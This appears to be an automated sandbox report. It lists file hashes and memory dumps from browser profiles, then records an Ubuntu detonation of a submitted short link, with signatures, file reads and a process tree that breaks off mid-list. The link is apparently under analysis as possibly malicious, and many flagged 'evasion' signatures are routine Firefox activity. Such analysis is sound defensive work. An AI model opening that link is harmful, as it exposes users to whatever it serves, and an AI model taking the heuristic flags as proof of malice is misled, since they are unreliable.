C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

MD5 9b792a87a71a049a3058c266e3b3a873
SHA1 3d46bd9999f9301c6b3f1563837b6134e53d656e
SHA256 11484ff09b61180c7451c89d6832715bc91635271befdc77efefb6b9db2db629
SHA512 3df989850ce080edaff1d7fd243574667baa474cc5e898721d1891b93d5e12c5b3d635734bd9720661a66a39a26c594b2a43d5a4f400dc8acd561e9631cb80fb

memory/4396-797-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/1104-805-0x0000000003630000-0x00000000036A8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json

MD5 a14d4b287e82b0c724252d7060b6d9e9
SHA1 da9d3da2df385d48f607445803f5817f635cc52d
SHA256 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA512 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 dd9217e59e20f0d91fb59a7161062e3d
SHA1 10382b2aee3b174d1887749834fc66b12d4f0a59
SHA256 e27d7ed5095b28e6db13ea06824800d3ec70c14c012eac0c8584ae3624412882
SHA512 8227e0563375a8ffd268c676ee159260bb8ce39634e71ca183d83843f17695ef9045d3b0f8bb1aeb97b791ed3507656585ad90a0ba44b389a7bf071437b88b67

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\prefs.js

MD5 72edba5d49977cd53f6a06de569149a1
SHA1 e70cfc7dff917c908b16763fa0cb551327546e66
SHA256 3191c3b27b62637f70dd9cfb56cbbf5aec6981240ad9f9655c8f48e7a563c625
SHA512 93baac514a77c8729c6cb0869feb4866409e6820678567fb451a8fbdcd14eaffd692bab6dc03ad02b5fa156ee201d797631916133bdf220f0eb73d15672f4b2d

memory/1104-1128-0x0000000004150000-0x00000000041DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ef2e2a599a09d89ee7f00ca86788c1df
SHA1 006c3dfe1d595751a16628ecb8e64b9e3e98a108
SHA256 c20b24ae32dfebd27d3fac4e256cb876dca426ee347aba625604ff4bf50c1910
SHA512 7144ec406f05bb05eaf76c3de74c253051f3c2f0c9ae38898d491cda2ff080a108c6408bea731d92a6884e4d047d480d11c1f341ed5c46d7da8675a7a1c5a8f4

memory/1104-1142-0x00000000041E0000-0x00000000042AC000-memory.dmp

memory/3052-1203-0x0000000001A60000-0x0000000002045000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c60958256e75927af97a40a59bb2ece0
SHA1 e54c461abfffcf12224190706c01981d2781ace1
SHA256 6676950c91d7b9dfbc50238943d8d17ce4551c48a8bebcca7c88e86630460ee2
SHA512 c84476ff75aaaa3751fde3e6e716bd77f8d0c2ccaac4cc02f41f5ade2162e5ccdea2844ced2c9548a6ae3741b47016cbc38e2d0147c7a706a1ee4f1d2bbcbaea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 51c55e896682b300f20ba9fbe083d30f
SHA1 c9c0028b9a7d2834f2f1a612a62301b90dcad685
SHA256 d4a56657f5ede19dd8662d59e4700977d21014e795b54623a9d9fecabbe924c3
SHA512 673c4b5d0e37084c75a5405af13d40accf2b0979262a7d6d677f46316661953c857e16a8a070092ba2e96c03131747cac9ec51a262339f762e30a5e75e8296ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 5c5775d1e60d149314c0de09e7f14f75
SHA1 6a24b491bb5f51b9288b9b93800a567c3a41b6ce
SHA256 fa41f1c273adb7d03ce4dee901b291e69f2cfa3c702e5f1a7d56e6be465155ac
SHA512 99f5ceaeedd4f1dc53ee57e121a512eb11403c001a1d6eac03356de5abfc8b15381020094525aebd6cb4105ff8cda9c76d8fb47836b156009ba0aeb22c816c38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/4396-1262-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 86cbe5c8a0661982f700e6d5b8c1e595
SHA1 4faffa542cf290945c548b072f91e037e8e5bbac
SHA256 a66071f9f1fb52f22021acadb6cd581bb0e8e9f40fed2f5634a5e911ad195d44
SHA512 6ead42a33077f9e9cc9309e7967fc48d2cd222166722280271dd6387de1fc0d24bdd381421992772f909391c170369739ab10970916a0d21f45966b0a5ee38c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 41231794b8ad870b099938bbeb3eecab
SHA1 ea80af27ca707ee734fbe4089f0b34b4928e09ca
SHA256 5953859b632aefe63969b837a64bd8b24c997a83f8580de5393e39192e274302
SHA512 f4f91ec12a361aef8b4a310ea0c5927f3bdcb6aaf282e5446baa6fa44f711d46659c12b7676499b4b8091e86f878e01b2bd81e04fa21bea8a587e3a2c7f10cb4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 64b530c8a6e474469185be55d298b021
SHA1 c18f2ec3815e802a184b3e7c9173d28cc8028ba8
SHA256 458869554101ac038204a420879591aa3688a9f8c1540d924b8351b70fd072de
SHA512 cf80ecef1748d3b4dcdebc32682854ec9f4dd6efde86bd1189a6f07b8fc9baeb907df4f75fe3bc59695410dd02685a91de6adf15b072bd0e9a7d58b82d8dae34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8393e53999978710d7bc480dddf3f436
SHA1 3f53e1c912a84755d9754bdede59ab48aa1b9891
SHA256 40a0be8b7501a45cc9688f4b9d13237637f2b69b5b2ea74728a58508d08dcc15
SHA512 a1b79e0bbd8c396d213e6cb8eaff0fd883448853803e0be12661e74060de153a434623c75b20e58f4a2d9697c05063a8fc0c94f577e35322d396879405bd75f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 58c61189c21d947b4096d326e34c246b
SHA1 1662478989bf05c5552500ea127213152a084125
SHA256 0ce21a79f691c1e33fb51415741906c08aa15a546d6ca1eefbf37cb90204ef67
SHA512 c4284a0457236bd3d4721fa4d99c2ef91941da78fb69993a2f236352603ba3b2fc650fb14dfb4fd22a248bacbe678455d3a0076eac2d1ccf279b33d1e0a9f1b8

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 18:01

Platform

ubuntu2004-amd64-20240508-en

Max time kernel

299s

Max time network

220s

Command Line

[xdg-open https://ify.ac/1Ic5]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A
Changes the process name, possibly in an attempt to hide itself gdbus N/A N/A
Changes the process name, possibly in an attempt to hide itself glean.dispatche N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser N/A N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser N/A N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background N/A N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background N/A N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread N/A N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread N/A N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor N/A N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor N/A N/A
Changes the process name, possibly in an attempt to hide itself Timer N/A N/A
Changes the process name, possibly in an attempt to hide itself Timer N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox N/A N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog N/A N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog N/A N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs N/A N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs N/A N/A
Changes the process name, possibly in an attempt to hide itself glxtest:disk$0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Cache2 I/O N/A N/A
Changes the process name, possibly in an attempt to hide itself Cookie N/A N/A
Changes the process name, possibly in an attempt to hide itself Cookie N/A N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher N/A N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher N/A N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer N/A N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer N/A N/A
Changes the process name, possibly in an attempt to hide itself Compositor N/A N/A
Changes the process name, possibly in an attempt to hide itself Compositor N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Renderer N/A N/A
Changes the process name, possibly in an attempt to hide itself Renderer N/A N/A
Changes the process name, possibly in an attempt to hide itself ImageIO N/A N/A
Changes the process name, possibly in an attempt to hide itself ImageIO N/A N/A
Changes the process name, possibly in an attempt to hide itself Permission N/A N/A
Changes the process name, possibly in an attempt to hide itself Permission N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch N/A N/A
Changes the process name, possibly in an attempt to hide itself SandboxReporter N/A N/A
Changes the process name, possibly in an attempt to hide itself SandboxReporter N/A N/A
Changes the process name, possibly in an attempt to hide itself Breakpad Server N/A N/A
Changes the process name, possibly in an attempt to hide itself Sandbox Forked N/A N/A
Changes the process name, possibly in an attempt to hide itself Chroot Helper N/A N/A
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A
Changes the process name, possibly in an attempt to hide itself gdbus N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-/usr/libex N/A N/A
Changes the process name, possibly in an attempt to hide itself gdbus N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/lib/firefox/firefox N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/nautilus N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/subsystem_device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/class /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:04.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:04.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/class /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/dbus/mask /usr/bin/dbus-daemon N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/fd/127 /usr/lib/firefox/firefox N/A
File opened for reading /proc/1761/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/gvfs-goa-volume-monitor N/A
File opened for reading /proc/1595/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/1596/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/100 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/1626/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/1788/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/1605/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd/95 /usr/lib/firefox/firefox N/A
File opened for reading /proc/1492/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/gvfsd-trash N/A
File opened for reading /proc/self/fd/128 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/129 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/1429/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd /usr/lib/firefox/firefox N/A
File opened for reading /proc/1795/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/bin/dbus-daemon N/A
File opened for reading /proc/1408/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/123 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/1581/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/1777/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/1575/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/task/1659/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-document-portal N/A
File opened for reading /proc/1799/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/132 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/gvfsd-fuse N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/89 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/126 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/fd/32 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/35 /usr/lib/firefox/firefox N/A
File opened for reading /proc/1585/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/bin/gnome-keyring-daemon N/A
File opened for reading /proc/1771/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/12 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/131 /usr/lib/firefox/firefox N/A
File opened for reading /proc/1492/root /usr/libexec/xdg-desktop-portal N/A
File opened for reading /proc/1771/cgroup /usr/libexec/gvfs-udisks2-volume-monitor N/A
File opened for reading /proc/1783/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/firefox/.parentlock /usr/lib/firefox/firefox N/A
File opened for modification /tmp/tmpaddon /usr/lib/firefox/firefox N/A

Processes

/usr/bin/xdg-open

[xdg-open https://ify.ac/1Ic5]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-daemon

[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/grep

[grep -q ^file://]

/usr/bin/egrep

[egrep -q ^[[:alpha:]+\.\-]+:]

/usr/local/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/local/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/sed

[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]

/usr/bin/xdg-mime

[xdg-mime query default x-scheme-handler/https]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/which

[which firefox]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/firefox

[/usr/bin/firefox https://ify.ac/1Ic5]

/usr/bin/which

[which /usr/bin/firefox]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox https://ify.ac/1Ic5]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/lib/firefox/glxtest

[/usr/lib/firefox/glxtest -f 13]

/usr/bin/lsb_release

[/usr/bin/lsb_release -idrc]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

